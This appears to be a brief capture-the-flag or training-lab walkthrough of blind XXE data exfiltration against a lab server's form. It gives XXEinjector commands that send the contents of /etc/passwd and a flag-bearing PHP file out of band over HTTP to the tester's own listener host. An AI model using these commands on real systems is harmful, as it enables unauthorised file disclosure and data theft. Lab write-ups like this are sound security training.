Blind Data Exfiltration

Using Blind Data Exfiltration on the '/blind' page to read the content of '/327a6c4304ad5938eaf0efb6cc3e53dc.php' and get the flag.

Form: http://10.129.202.84/blind/

Intercept the POST request after submitting the form

Remove the inputs and close the request with XXEINJECT at the bottom of the request.

Copy to file > xxe.req

ruby XXEinjector.rb --host=10.10.14.36 --httpport=8000 --file=xxe.req --path=/etc/passwd --oob=http --phpfilter

/etc/passwd logs will be stored in the Logs folder.

Try to read /327a6c4304ad5938eaf0efb6cc3e53dc.php

ruby XXEinjector.rb --host=10.10.14.36 --httpport=8000 --file=xxe.req --path=/327a6c4304ad5938eaf0efb6cc3e53dc.php --oob=http --phpfilter

Last updated 1 year ago